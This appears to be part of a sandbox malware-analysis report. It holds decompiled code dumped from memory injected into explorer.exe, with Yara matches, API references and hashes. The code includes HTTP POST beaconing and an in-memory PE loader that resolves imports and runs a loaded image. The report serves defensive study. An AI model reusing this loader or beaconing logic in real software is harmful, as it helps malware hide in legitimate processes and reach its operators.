                                                                                                            										_v20 = 0;
                                                                                                            										_v16 = 0;
                                                                                                            										E032E8F0A( &_v20, 0, _t122);
                                                                                                            										_t127 =  *0x32ff900; // 0x0
                                                                                                            										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
                                                                                                            										if(__eflags != 0) {
                                                                                                            											_t129 = E032EA10C( &_v20, __eflags);
                                                                                                            											__eflags = _t129 - 0xc8;
                                                                                                            											if(_t129 == 0xc8) {
                                                                                                            												 *_a20 = _t194;
                                                                                                            												 *_a12 = _t189;
                                                                                                            												 *_a16 = _t165;
                                                                                                            												__eflags = 0;
                                                                                                            												return 0;
                                                                                                            											}
                                                                                                            											_v12 =  ~_t129;
                                                                                                            											L29:
                                                                                                            											_t135 =  *0x32ff900; // 0x0
                                                                                                            											 *((intOrPtr*)(_t135 + 8))(_t194);
                                                                                                            											_t195 = _v12;
                                                                                                            											L30:
                                                                                                            											__eflags = _t165;
                                                                                                            											if(_t165 != 0) {
                                                                                                            												_t139 =  *0x32ff900; // 0x0
                                                                                                            												 *((intOrPtr*)(_t139 + 8))(_t165);
                                                                                                            											}
                                                                                                            											__eflags = _t189;
                                                                                                            											if(_t189 != 0) {
                                                                                                            												_t179 =  *0x32ff900; // 0x0
                                                                                                            												 *((intOrPtr*)(_t179 + 8))(_t189);
                                                                                                            											}
                                                                                                            											return _t195;
                                                                                                            										}
                                                                                                            										GetLastError();
                                                                                                            										_v12 = 0xfffffff8;
                                                                                                            										goto L29;
                                                                                                            									} else {
                                                                                                            										GetLastError();
                                                                                                            										_t143 =  *0x32ff900; // 0x0
                                                                                                            										 *((intOrPtr*)(_t143 + 8))(_t194);
                                                                                                            										_t145 =  *0x32ff900; // 0x0
                                                                                                            										_v8 = _v8 & 0x00000000;
                                                                                                            										 *((intOrPtr*)(_t145 + 8))(_t165);
                                                                                                            										_t147 =  *0x32ff900; // 0x0
                                                                                                            										_t165 = 0;
                                                                                                            										__eflags = 0;
                                                                                                            										 *((intOrPtr*)(_t147 + 8))(_t189);
                                                                                                            										_t194 = _v8;
                                                                                                            										goto L21;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									GetLastError();
                                                                                                            									_t153 =  *0x32ff900; // 0x0
                                                                                                            									 *((intOrPtr*)(_t153 + 8))(_t165);
                                                                                                            									_t155 =  *0x32ff900; // 0x0
                                                                                                            									_t165 = 0;
                                                                                                            									 *((intOrPtr*)(_t155 + 8))(_t189);
                                                                                                            									_t189 = 0;
                                                                                                            									_t194 = _v8;
                                                                                                            									goto L22;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								GetLastError();
                                                                                                            								_t159 =  *0x32ff900; // 0x0
                                                                                                            								 *((intOrPtr*)(_t159 + 8))(_t189);
                                                                                                            								L21:
                                                                                                            								_t189 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            								goto L22;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						GetLastError();
                                                                                                            						L22:
                                                                                                            						_t186 = _t194;
                                                                                                            						_t104 = _v12 + 1;
                                                                                                            						_v12 = _t104;
                                                                                                            						__eflags = _t104 - 2;
                                                                                                            					} while (_t104 < 2);
                                                                                                            					__eflags = _t186;
                                                                                                            					if(_t186 != 0) {
                                                                                                            						goto L25;
                                                                                                            					}
                                                                                                            					_t195 = 0xfffffffe;
                                                                                                            					goto L30;
                                                                                                            				}
                                                                                                            				_t163 = 0xfffffffc;
                                                                                                            				return _t163;
                                                                                                            			}

                                                                                                            0x032ef9d3
                                                                                                            0x032ef9d3
                                                                                                            0x032ef9d9
                                                                                                            0x032ef9df
                                                                                                            0x032ef9e2
                                                                                                            0x032ef9e7
                                                                                                            0x032ef9ea
                                                                                                            0x032ef9ed
                                                                                                            0x032ef9ef
                                                                                                            0x00000000
                                                                                                            0x032ef9ef
                                                                                                            0x032ef97b
                                                                                                            0x032ef97b
                                                                                                            0x032ef981
                                                                                                            0x032ef987
                                                                                                            0x032efa77
                                                                                                            0x032efa77
                                                                                                            0x032efa77
                                                                                                            0x00000000
                                                                                                            0x032efa77
                                                                                                            0x032ef979
                                                                                                            0x032ef93a
                                                                                                            0x032efa79
                                                                                                            0x032efa7c
                                                                                                            0x032efa7e
                                                                                                            0x032efa81
                                                                                                            0x032efa84
                                                                                                            0x032efa84
                                                                                                            0x032efa8d
                                                                                                            0x032efa8f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032efa93
                                                                                                            0x00000000
                                                                                                            0x032efa93
                                                                                                            0x032ef909
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 032EF854
                                                                                                            • memset.MSVCRT ref: 032EF865
                                                                                                              • Part of subcall function 032E8F0A: memset.MSVCRT ref: 032E8F1C
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 032EF93A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: memset$ErrorLast
                                                                                                            • String ID: POST
                                                                                                            • API String ID: 2570506013-1814004025
                                                                                                            • Opcode ID: 39cb92e27b3b6e85f0d29fb984fcdb8ca882c0eeb17c03ac34d8d3b2beb2d548
                                                                                                            • Instruction ID: e71412aac152e1cf2fca2af8d37e1bfca0a8827cc544e60dcfb1288f9c1364e0
                                                                                                            • Opcode Fuzzy Hash: 39cb92e27b3b6e85f0d29fb984fcdb8ca882c0eeb17c03ac34d8d3b2beb2d548
                                                                                                            • Instruction Fuzzy Hash: B5A19F75910219FFDB10EFA4D989AAEB7B8FF08710F55406AE905EB350DB749E80CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _snprintfqsort
                                                                                                            • String ID: %I64d$false$null$true
                                                                                                            • API String ID: 756996078-4285102228
                                                                                                            • Opcode ID: 924df01534f4bf584308655940a4f696d5f420af53e34f2437cb539854fddfc8
                                                                                                            • Instruction ID: 60ab543770522ce2a9f5bb9d86a1494eb0071a451e7b193661610df43cb51203
                                                                                                            • Opcode Fuzzy Hash: 924df01534f4bf584308655940a4f696d5f420af53e34f2437cb539854fddfc8
                                                                                                            • Instruction Fuzzy Hash: A6E17D7192020AEFEF15DEA4DD41EBFBB69EF45240F444078FE159A241E671E6F08BA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E032E4FE8(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                            				void _v532;
                                                                                                            				char _v548;
                                                                                                            				char _v580;
                                                                                                            				char _v584;
                                                                                                            				short _v588;
                                                                                                            				WCHAR* _v592;
                                                                                                            				WCHAR* _v596;
                                                                                                            				intOrPtr _v600;
                                                                                                            				char _v628;
                                                                                                            				char _v632;
                                                                                                            				void* __ebx;
                                                                                                            				void* __esi;
                                                                                                            				short _t47;
                                                                                                            				WCHAR* _t54;
                                                                                                            				WCHAR* _t55;
                                                                                                            				intOrPtr _t56;
                                                                                                            				signed int _t61;
                                                                                                            				void* _t65;
                                                                                                            				void* _t66;
                                                                                                            				WCHAR* _t67;
                                                                                                            				intOrPtr _t68;
                                                                                                            				WCHAR* _t70;
                                                                                                            				intOrPtr _t71;
                                                                                                            				WCHAR* _t73;
                                                                                                            				WCHAR* _t83;
                                                                                                            				intOrPtr _t84;
                                                                                                            				void* _t85;
                                                                                                            				intOrPtr _t86;
                                                                                                            				void* _t93;
                                                                                                            				intOrPtr _t94;
                                                                                                            				intOrPtr _t96;
                                                                                                            				void* _t99;
                                                                                                            				void* _t100;
                                                                                                            				WCHAR* _t101;
                                                                                                            				void* _t112;
                                                                                                            				WCHAR* _t116;
                                                                                                            				intOrPtr _t127;
                                                                                                            				void* _t128;
                                                                                                            				void* _t146;
                                                                                                            				WCHAR* _t149;
                                                                                                            				void* _t150;
                                                                                                            				void* _t152;
                                                                                                            				void* _t156;
                                                                                                            				WCHAR* _t157;
                                                                                                            				WCHAR* _t159;
                                                                                                            				signed int _t160;
                                                                                                            				signed int _t161;
                                                                                                            				intOrPtr* _t163;
                                                                                                            				signed int _t165;
                                                                                                            				void* _t168;
                                                                                                            				void* _t169;
                                                                                                            				intOrPtr* _t170;
                                                                                                            				void* _t175;
                                                                                                            
                                                                                                            				_t175 = __fp0;
                                                                                                            				_push(_t160);
                                                                                                            				_t99 = __edx;
                                                                                                            				_t156 = __ecx;
                                                                                                            				_t161 = _t160 | 0xffffffff;
                                                                                                            				memset( &_v532, 0, 0x20c);
                                                                                                            				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
                                                                                                            				_v592 = 1;
                                                                                                            				if(_t156 != 0) {
                                                                                                            					_t94 =  *0x32ff8e4; // 0x3310000
                                                                                                            					_t96 =  *0x32ff8e8; // 0x52ef8b8
                                                                                                            					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x110)))));
                                                                                                            				}
                                                                                                            				if(E032ECB96(_t156) != 0) {
                                                                                                            					L4:
                                                                                                            					_t47 = E032EC86B();
                                                                                                            					_push(_t99);
                                                                                                            					_v588 = _t47;
                                                                                                            					E032EC65E(_t47,  &_v580, _t173, _t175);
                                                                                                            					_t100 = E032E4FA4( &_v580,  &_v580, _t173);
                                                                                                            					_t112 = E032EE3C8( &_v580, E032EA5DA( &_v580), 0);
                                                                                                            					E032EC881(_t112,  &_v548, _t175);
                                                                                                            					_push(_t112);
                                                                                                            					_t54 = E032E311B(_t156,  &_v580, _t173, _t175);
                                                                                                            					_v596 = _t54;
                                                                                                            					if(_t54 != 0) {
                                                                                                            						_push(0);
                                                                                                            						_push(_t100);
                                                                                                            						_push(0x32fc9d8);
                                                                                                            						_t55 = E032E9BF7(_t54);
                                                                                                            						_t169 = _t168 + 0x10;
                                                                                                            						_t101 = _t55;
                                                                                                            						__eflags = _v592;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							_t56 = E032E9A5A(_v596);
                                                                                                            							_t116 = _t101;
                                                                                                            							 *0x32ff9a0 = _t56;
                                                                                                            							 *0x32ff998 = E032E9A5A(_t116);
                                                                                                            							L12:
                                                                                                            							_push(_t116);
                                                                                                            							_t157 = E032EA7D0( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
                                                                                                            							_t170 = _t169 + 0x10;
                                                                                                            							__eflags = _t157;
                                                                                                            							if(_t157 == 0) {
                                                                                                            								goto L36;
                                                                                                            							}
                                                                                                            							_push(0x32fca26);
                                                                                                            							_t146 = 0xe;
                                                                                                            							E032EAC40(_t146, _t175);
                                                                                                            							E032EAC79(_t157, _t175, _t101);
                                                                                                            							_t163 = _a4;
                                                                                                            							_push( *_t163);
                                                                                                            							E032EAC1B(0xb);
                                                                                                            							_t148 =  *(_t163 + 0x10);
                                                                                                            							__eflags =  *(_t163 + 0x10);
                                                                                                            							if( *(_t163 + 0x10) != 0) {
                                                                                                            								E032EB1C2(_t148, _t175);
                                                                                                            							}
                                                                                                            							_t149 =  *(_t163 + 0xc);
                                                                                                            							__eflags = _t149;
                                                                                                            							if(_t149 != 0) {
                                                                                                            								E032EB1C2(_t149, _t175);
                                                                                                            							}
                                                                                                            							_t65 = E032EA202(0);
                                                                                                            							_push(_t149);
                                                                                                            							_t150 = 2;
                                                                                                            							_t66 = E032EABED();
                                                                                                            							__eflags = _v592;
                                                                                                            							_t127 = _t65;
                                                                                                            							if(_v592 == 0) {
                                                                                                            								_t127 =  *0x32ff8e4; // 0x3310000
                                                                                                            								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_t67 = E032F0DFC(_t66, _t101, _t150, _t175, 0, _t101, 0);
                                                                                                            									_t170 = _t170 + 0xc;
                                                                                                            									goto L21;
                                                                                                            								}
                                                                                                            								_t127 = _t127 + 0x228;
                                                                                                            								goto L20;
                                                                                                            							} else {
                                                                                                            								_t68 =  *0x32ff8e4; // 0x3310000
                                                                                                            								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
                                                                                                            								if(__eflags != 0) {
                                                                                                            									L27:
                                                                                                            									__eflags =  *(_t68 + 0x1898) & 0x00000082;
                                                                                                            									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
                                                                                                            										_t152 = 0x64;
                                                                                                            										E032EF1DB(_t152);
                                                                                                            									}
                                                                                                            									E032E5603( &_v580, _t175);
                                                                                                            									_t159 = _a8;
                                                                                                            									_t128 = _t127;
                                                                                                            									__eflags = _t159;
                                                                                                            									if(_t159 != 0) {
                                                                                                            										_t71 =  *0x32ff8e4; // 0x3310000
                                                                                                            										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
                                                                                                            										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
                                                                                                            											lstrcpyW(_t159, _t101);
                                                                                                            										} else {
                                                                                                            											_t73 = E032E109A(_t128, 0x1c7);
                                                                                                            											_v596 = _t73;
                                                                                                            											lstrcpyW(_t159, _t73);
                                                                                                            											E032E8D41( &_v596);
                                                                                                            											 *_t170 = "\"";
                                                                                                            											lstrcatW(_t159, ??);
                                                                                                            											lstrcatW(_t159, _t101);
                                                                                                            											lstrcatW(_t159, "\"");
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t70 = _a12;
                                                                                                            									__eflags = _t70;
                                                                                                            									if(_t70 != 0) {
                                                                                                            										 *_t70 = _v588;
                                                                                                            									}
                                                                                                            									_t161 = 0;
                                                                                                            									__eflags = 0;
                                                                                                            									goto L36;
                                                                                                            								}
                                                                                                            								_t32 = _t68 + 0x228; // 0x3310228
                                                                                                            								_t127 = _t32;
                                                                                                            								L20:
                                                                                                            								_t67 = E032E5878(_t127, _t101, __eflags);
                                                                                                            								L21:
                                                                                                            								__eflags = _t67;
                                                                                                            								if(_t67 >= 0) {
                                                                                                            									_t68 =  *0x32ff8e4; // 0x3310000
                                                                                                            									goto L27;
                                                                                                            								}
                                                                                                            								_push(0xfffffffd);
                                                                                                            								L6:
                                                                                                            								_pop(_t161);
                                                                                                            								goto L36;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t83 = E032ED224(_v588, __eflags);
                                                                                                            						_v596 = _t83;
                                                                                                            						_t84 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                                                                                            						__eflags = _t85 - _t161;
                                                                                                            						if(_t85 != _t161) {
                                                                                                            							_t86 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            							 *((intOrPtr*)(_t86 + 0x30))();
                                                                                                            							E032E8D86( &_v632, _t161);
                                                                                                            							_t116 = _t85;
                                                                                                            							goto L12;
                                                                                                            						}
                                                                                                            						E032E8D86( &_v628, _t161);
                                                                                                            						_t61 = 1;
                                                                                                            						goto L37;
                                                                                                            					}
                                                                                                            					_push(0xfffffffe);
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					_t93 = E032E3034( &_v532, _t161, 0x105);
                                                                                                            					_t173 = _t93;
                                                                                                            					if(_t93 == 0) {
                                                                                                            						L36:
                                                                                                            						_t61 = _t161;
                                                                                                            						L37:
                                                                                                            						return _t61;
                                                                                                            					}
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 032E500A
                                                                                                            • lstrcpyW.KERNEL32 ref: 032E5270
                                                                                                            • lstrcatW.KERNEL32(00000000,?), ref: 032E528E
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 032E5292
                                                                                                            • lstrcatW.KERNEL32(00000000,032FCA28), ref: 032E529A
                                                                                                              • Part of subcall function 032E8D86: RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FreeHeaplstrcpymemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 911671052-0
                                                                                                            • Opcode ID: d8cc735e65893f1d515deebff2e034098250bc0585287bd3a7978c64e21791e4
                                                                                                            • Instruction ID: 10e12367ee0f205de1284dd353e80af6ff734174ea570d1f81b93cabba6c984f
                                                                                                            • Opcode Fuzzy Hash: d8cc735e65893f1d515deebff2e034098250bc0585287bd3a7978c64e21791e4
                                                                                                            • Instruction Fuzzy Hash: A9710439734301AFD714EB60E946B7E73E9EF85624F64452EF5059F280EBB0D8848A91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E032EDF29(WCHAR* __ecx) {
                                                                                                            				int _v8;
                                                                                                            				WCHAR* _v12;
                                                                                                            				WCHAR* _v16;
                                                                                                            				WCHAR* _v140;
                                                                                                            				WCHAR* _v144;
                                                                                                            				short _v664;
                                                                                                            				signed int _t28;
                                                                                                            				signed int _t29;
                                                                                                            				signed int _t30;
                                                                                                            				WCHAR* _t36;
                                                                                                            				int _t40;
                                                                                                            				signed int _t41;
                                                                                                            				int _t44;
                                                                                                            				signed int _t45;
                                                                                                            				WCHAR* _t49;
                                                                                                            				signed int _t51;
                                                                                                            				WCHAR* _t52;
                                                                                                            				void* _t53;
                                                                                                            
                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                            				_v16 = __ecx;
                                                                                                            				_t51 = 0;
                                                                                                            				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                            				_t44 = _v8;
                                                                                                            				_t41 = 0;
                                                                                                            				_v12 = _t28;
                                                                                                            				if(_t44 <= 0) {
                                                                                                            					L22:
                                                                                                            					_t29 = _t28 | 0xffffffff;
                                                                                                            					__eflags = _t29;
                                                                                                            					return _t29;
                                                                                                            				} else {
                                                                                                            					goto L1;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					L1:
                                                                                                            					_t49 =  *(_t28 + _t41 * 4);
                                                                                                            					_t30 =  *_t49 & 0x0000ffff;
                                                                                                            					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                            						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                            						_t40 = lstrlenW(_t49);
                                                                                                            						_t45 = 0;
                                                                                                            						if(_t40 <= 0) {
                                                                                                            							L11:
                                                                                                            							_t44 = _v8;
                                                                                                            							_t51 = _t51 + 1;
                                                                                                            							goto L12;
                                                                                                            						} else {
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L8:
                                                                                                            							if(_t49[_t45] == 0x2c) {
                                                                                                            								_t49[_t45] = 0;
                                                                                                            							}
                                                                                                            							_t45 = _t45 + 1;
                                                                                                            						} while (_t45 < _t40);
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            					L12:
                                                                                                            					_t28 = _v12;
                                                                                                            					_t41 = _t41 + 1;
                                                                                                            				} while (_t41 < _t44);
                                                                                                            				if(_t51 != 1) {
                                                                                                            					if(__eflags <= 0) {
                                                                                                            						goto L22;
                                                                                                            					}
                                                                                                            					_t52 = _v140;
                                                                                                            					L17:
                                                                                                            					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                            						lstrcpynW(_v16, _t52, 0x104);
                                                                                                            					} else {
                                                                                                            						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                            						_push(0);
                                                                                                            						_push(_t52);
                                                                                                            						_push(0x32fc9d8);
                                                                                                            						_t36 = E032E9BF7( &_v664);
                                                                                                            						_v12 = _t36;
                                                                                                            						lstrcpynW(_v16, _t36, 0x104);
                                                                                                            						E032E8D86( &_v12, 0xfffffffe);
                                                                                                            					}
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t52 = _v144;
                                                                                                            				goto L17;
                                                                                                            			}






















                                                                                                            APIs
                                                                                                            • GetCommandLineW.KERNEL32 ref: 032EDF3E
                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 032EDF49
                                                                                                            • lstrlenW.KERNEL32 ref: 032EDF8B
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 032EDFE4
                                                                                                            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 032EE009
                                                                                                            • lstrcpynW.KERNEL32(?,?,00000104), ref: 032EE027
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1259063344-0
                                                                                                            • Opcode ID: 477a2b1a2737c4c470c15922dccabef4ad21ec622f331272725277193d7a01ba
                                                                                                            • Instruction ID: a799a0aa2da1e6bdcb0f4acb0072aca261d765a4b14e4da8c7bea2f13957b6a1
                                                                                                            • Opcode Fuzzy Hash: 477a2b1a2737c4c470c15922dccabef4ad21ec622f331272725277193d7a01ba
                                                                                                            • Instruction Fuzzy Hash: E2310771D20116AFCF24EB94DC9AFADB7B8EF04721F9445A9E405E61A0E77099C1CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EE76D
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 032EE775
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EE789
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EE804
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EE807
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EE80C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 344208780-0
                                                                                                            • Opcode ID: f67fb72c8f5a7dcab01e0a054aded31cdde7d6f76652d7364f0dea24f6457072
                                                                                                            • Instruction ID: a9e9f33cbbc0fde5441a9b11a554cc399cec63df734f82204837473eecc278ec
                                                                                                            • Opcode Fuzzy Hash: f67fb72c8f5a7dcab01e0a054aded31cdde7d6f76652d7364f0dea24f6457072
                                                                                                            • Instruction Fuzzy Hash: 55212C75900219BFDB00DFA5CC88DAFBBBDEF48654B2044AAF505EB250D771AE41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 20%
                                                                                                            			E032F3DE4(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                            				signed int _v5;
                                                                                                            				signed short _v12;
                                                                                                            				intOrPtr* _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				signed int* _v24;
                                                                                                            				unsigned int _v28;
                                                                                                            				signed short* _v32;
                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                            				signed int _v40;
                                                                                                            				signed int _v44;
                                                                                                            				intOrPtr* _v48;
                                                                                                            				signed short* _v52;
                                                                                                            				intOrPtr _v56;
                                                                                                            				unsigned int _v60;
                                                                                                            				intOrPtr _v64;
                                                                                                            				_Unknown_base(*)()* _v68;
                                                                                                            				signed int _v72;
                                                                                                            				intOrPtr _v76;
                                                                                                            				intOrPtr _v80;
                                                                                                            				intOrPtr _v84;
                                                                                                            				unsigned int _v88;
                                                                                                            				intOrPtr _v92;
                                                                                                            				signed int _v96;
                                                                                                            				intOrPtr _v100;
                                                                                                            				intOrPtr _v104;
                                                                                                            				intOrPtr _v108;
                                                                                                            				intOrPtr _v112;
                                                                                                            				CHAR* _v116;
                                                                                                            				signed int _v120;
                                                                                                            				intOrPtr _v124;
                                                                                                            				signed int _v128;
                                                                                                            				signed int _v132;
                                                                                                            				signed int _t216;
                                                                                                            				signed int _t233;
                                                                                                            				void* _t273;
                                                                                                            				signed int _t278;
                                                                                                            				signed int _t280;
                                                                                                            				intOrPtr _t320;
                                                                                                            
                                                                                                            				_v44 = _v44 & 0x00000000;
                                                                                                            				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                            				_v20 = _v84;
                                                                                                            				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                            				_v64 = _t320;
                                                                                                            				if(_t320 == 0) {
                                                                                                            					L13:
                                                                                                            					while(0 != 0) {
                                                                                                            					}
                                                                                                            					_push(8);
                                                                                                            					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                            						L35:
                                                                                                            						if(_a16 == 0) {
                                                                                                            							L54:
                                                                                                            							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                            							while(0 != 0) {
                                                                                                            							}
                                                                                                            							if(_a12 != 0) {
                                                                                                            								 *_a12 = _v80;
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                            							_v124 = _v80(_a4, 1, _a8);
                                                                                                            							while(0 != 0) {
                                                                                                            							}
                                                                                                            							if(_v124 != 0) {
                                                                                                            								if(_v44 == 0) {
                                                                                                            									L77:
                                                                                                            									return 1;
                                                                                                            								}
                                                                                                            								if(_a20 != 1) {
                                                                                                            									if(_a20 != 2) {
                                                                                                            										L75:
                                                                                                            										while(0 != 0) {
                                                                                                            										}
                                                                                                            										goto L77;
                                                                                                            									}
                                                                                                            									while(0 != 0) {
                                                                                                            									}
                                                                                                            									_v132 = _v44;
                                                                                                            									goto L75;
                                                                                                            								}
                                                                                                            								while(0 != 0) {
                                                                                                            								}
                                                                                                            								_v44();
                                                                                                            								goto L75;
                                                                                                            							}
                                                                                                            							while(0 != 0) {
                                                                                                            							}
                                                                                                            							return 0;
                                                                                                            						}
                                                                                                            						while(0 != 0) {
                                                                                                            						}
                                                                                                            						_push(8);
                                                                                                            						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                            							goto L54;
                                                                                                            						}
                                                                                                            						_v128 = 0x80000000;
                                                                                                            						_t216 = 8;
                                                                                                            						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
                                                                                                            						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                            						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                            						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                            						while(0 != 0) {
                                                                                                            						}
                                                                                                            						_v40 = _v40 & 0x00000000;
                                                                                                            						while(_v40 < _v104) {
                                                                                                            							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                            							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                            							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                            								_v40 = _v40 + 1;
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							while(0 != 0) {
                                                                                                            							}
                                                                                                            							_v44 = _v120;
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						if(_v44 != 0) {
                                                                                                            							goto L54;
                                                                                                            						}
                                                                                                            						while(0 != 0) {
                                                                                                            						}
                                                                                                            						return 0xffffffff;
                                                                                                            					}
                                                                                                            					_v96 = 0x80000000;
                                                                                                            					_t233 = 8;
                                                                                                            					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
                                                                                                            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                            						if(_v36 == 0) {
                                                                                                            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                            						}
                                                                                                            						if(_v36 != 0) {
                                                                                                            							if( *_v16 == 0) {
                                                                                                            								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                            							} else {
                                                                                                            								_v24 =  *_v16 + _a4;
                                                                                                            							}
                                                                                                            							_v72 = _v72 & 0x00000000;
                                                                                                            							while( *_v24 != 0) {
                                                                                                            								if(( *_v24 & _v96) == 0) {
                                                                                                            									_v100 =  *_v24 + _a4;
                                                                                                            									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                            								} else {
